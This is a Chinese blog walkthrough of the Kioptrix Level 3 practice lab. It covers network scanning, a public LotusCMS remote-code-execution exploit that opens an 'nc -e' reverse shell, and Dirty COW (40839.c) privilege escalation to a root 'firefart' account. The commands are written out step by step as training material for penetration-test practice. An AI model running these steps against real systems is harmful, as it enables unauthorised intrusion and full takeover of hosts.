打靶日记Kioptix Level 3(脏牛提权)

最新推荐文章于 2025-03-18 19:06:44 发布
最新推荐文章于 2025-03-18 19:06:44 发布
阅读量1.1k 收藏 19
点赞数 33
文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2403_88668158/article/details/145481346
版权

目录

一、探测靶机IP(进行信息收集)

ifconfig

ifconfig 查看自己网段,kali和靶机的网段一样
在这里插入图片描述

nmap -p- 192.168.253.0/24

在这里插入图片描述

二、进入网页

在浏览器输入靶机ip即可
在这里插入图片描述

发现这里有个login登录,还有一个LotusCMS,看看有没有历史漏洞

三、利用工具searchsploit 查找相关漏洞与exp

在这里插入图片描述

因为oscp考试只能使用一次msf,所以不使用
在这里插入图片描述

searchsploit -m 16982

Multiple Vulnerabilities的意思为多个漏洞,没什么用,反弹不了shell

四、反弹shell

去github上搜搜https://github.com/Hood3dRob1n/LotusCMS-Exploit
甚至有个视频教,视频很详细,直接克隆,要是访问不上就直接在主机下好拖进去

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git

在这里插入图片描述

直接执行
在这里插入图片描述

./lotusRCE.sh

执行后可以看到示例,exp使用方法:./lotusRCE.sh ip,这里ip写靶机的ip
在这里插入图片描述

在kali开一个终端作为shell的接收端,并在exp里输入kali的ip和监听的端口,然后选择第一个“nc -e”
在这里插入图片描述
在这里插入图片描述

稳定shell界面

python -c "import pty; pty.spawn('/bin/bash');"

在这里插入图片描述

五、下载exp提权

然后再查看版本号搜集信息

uname -a 
lsb_release -a

在这里插入图片描述

这里再去搜集一下

searchsploit linux 2.6.24 Privilege

发现只有这三个符合
在这里插入图片描述

先尝试40616.c
在这里插入图片描述

searchsploit -m 40616.c
gcc -o exp 40616.c

在这里插入图片描述

发现报错,若编译exp中出现如下-W开头的报错,可以添加-Wno参数继续编译,虽然会生成一个exp文件,但最后还是有问题

gcc -o exp 40616.c -Wno-implicit-function-declaration

搭建一个简单的 HTTP 文件服务器,默认将当前工作目录作为文件服务器的根目录,允许其他设备通过网络访问该目录下的文件

python -m http.server

在这里插入图片描述

进入tmp目录

cd /tmp
./exp

说没有权限,后面发现只有下载在靶机里编译好之后才有执行权限,编译好的再下载进去是没有的,这个40616.c并不能提权,之后就尝试40839.c
在这里插入图片描述

只有下载到靶机里面去了,在靶机编译才有执行权限,在这个目录chmod命令没用
在这里插入图片描述

发现报错,尝试40839.c

searchsploit -m 40839.c

将40839.c编译,发现报错,上面的40616.c还是可以编译成的,这个直接不能编译,cat进去看看
发现有使用方法,将dirty.c替换成40839.c就ok了
[图片]

gcc -pthread 40839.c -o dirty -lcrypt

在这里插入图片描述

可以看到编译好了,直接执行./dirty,输入新密码
在这里插入图片描述

然后重新连一下
在这里插入图片描述

可以看到提权成功,firefart用户已经是root组的用户

临观_
关注
安全漏洞--linux 最新内核通用漏洞利用示例 (Dirty COW)
关注互联网安全的小虾米一枚
10-21 2万+
0x01 简介 Linux内核在处理内存写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。一个低限的本地用户能够利用此漏洞获取其他只读内存映射的写限,有可能进一步导致漏洞。 CVE-2016-5195: https://access.redhat.com/security/cve/CVE-2016-5195 0x02 漏洞
DirtyCow()漏洞复现
Brucetg的博客
08-20 2万+
该文章首发于: 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521 这几天发现90sec需要登录才能浏览文章,为了方便就把该文章也发在个人博客,并顺便把之前编译好的EXP也一块放出来。 编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子...
Linux-->CVE-2016-5195
weixin_63124284的博客
12-15 465
linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高限,对只读内存映射进行访问。 并且在的时候,杀毒软件并不会检测到。
渗透之
shy的博客
09-14 1429
1,确定系统版本 Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 2,新建低限的用户和切换到该用户 3下载exp 下载地址:https://link.jianshu.com/?t=https%3A%2F%2Fgithub.com%2FFireFart%2Fdirtycow 4,编译 5,将编译好的exp上传到目标机上去 ./dirty新密码进行 ...
dirtycowlinuxexp
03-25
dirtycowlinuxexp
xss、.zip
06-18
包含xss注入闯关小游戏和exp等干货
(cve-2016-5159)
haha1314的博客
07-22 2万+
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低限的用户可利用这一漏洞在本地进行 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高限,对只读内存映射进行访问。 竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统限,甚至可...
HTB打靶日记:BroScience
01-10
这样,当我们上传证书时,系统执行了命令,使我们获得了SUID限,最终通过操作成为root用户,完成了对目标系统的完全控制。 总结来说,“BroScience”靶场机器展示了多种常见的安全漏洞和攻击手段,包括但不...
HTB打靶日记:Investigation
01-27
hackthebox
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。...
HTB打靶日记:Mentor
01-11
hackthebox
VulnHub Kioptrix Level 4 通过sqlmap --os shell 的详细打靶过程及相应代码
10-26
VulnHub的Kioptrix Level 4是一个常见的渗透测试平台,它模拟了一个Linux服务器环境,挑战玩家通过一系列的安全漏洞进行系统级别的升。在这个级别中,其中一个目标是利用SQL注入漏洞并使用`sqlmap`工具获取...
Linux漏洞
sGanYu
07-19 1583
通过查看kali自身的IP地址,如下图,确定当前靶机也在192.168.200下,使用nmap进行C段扫描。退出shell交互模式,返回meterpreter会话,将脚本上传至目标地址。首先我们使用nmap的sP参数通过ping探测已存活的主机。进入目标主机的/tmp目录,查看上传的1.sh是否存在。启动msf,通过msf搜索所有关于Drupal的漏洞。启动靶机后,默认是不给用户名、密码和IP地址的。上传漏洞收集脚本到目标主机赋予执行限并执行。开启py终端,运行./dcow,获取密码。......
Linux漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 漏洞 exp1复现: exp2复现: 漏洞 漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
U3D 打靶游戏 demo 要源代码 可以联系我
09-25
【Unity3D(U3D)打靶游戏开发详解】 Unity3D,简称U3D,是一款强大的跨平台游戏开发引擎,广泛应用于游戏、虚拟现实(VR)、增强现实(AR)等多个领域。这款引擎以其易用性、高效性能以及丰富的资源库著称,使得...
打靶日记--hackthebox--IClean
qq_64036695的博客
04-15 1062
linux在/etc/hosts手动将域名映射到特定的 IP 地址,从而绕过 DNS 解析的需要,windows则在C:\Windows\System32\drivers\etc做添加:(我这里是linux)可以以root限执行,那么以前打ctf的知识就用上了哈哈哈哈,把root用户的ssh私钥嵌入到pdf中,攻击机去下载,使用ctf常用工具binwalk分离文件,然后得到ssh私钥登录root用户,直接拿下!它设置一个端口转发配置,将目标计算机上端口 3306 的连接转发到本地主机上的端口 3306。
Linux】深度解析Linux进程管理:从进程PCB到创建子进程的全景指南
最新发布
weixin_51821336的博客
03-18 992
Linux操作系统中,进程管理是操作系统核心功能模块之一,其本质是通过地址空间抽象与动态资源调度实现多任务并发执行。本文将从进程控制块(task_struct)、内存管理单元(MMU)到调度算法(CFS)的实现机制展开分析,揭示操作系统如何通过精妙的数据结构与算法设计,构建高效可靠的进程管理体系。承上启下:上篇最后到了操作系统是通过先描述,再组织的方式管理资源,同样的,操作系统也是以同样的方式进行进程的管理。
Linux中部署DeepSeek R1
SmileSunshines的博客
03-18 876
Linux中部署DeepSeek-R1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值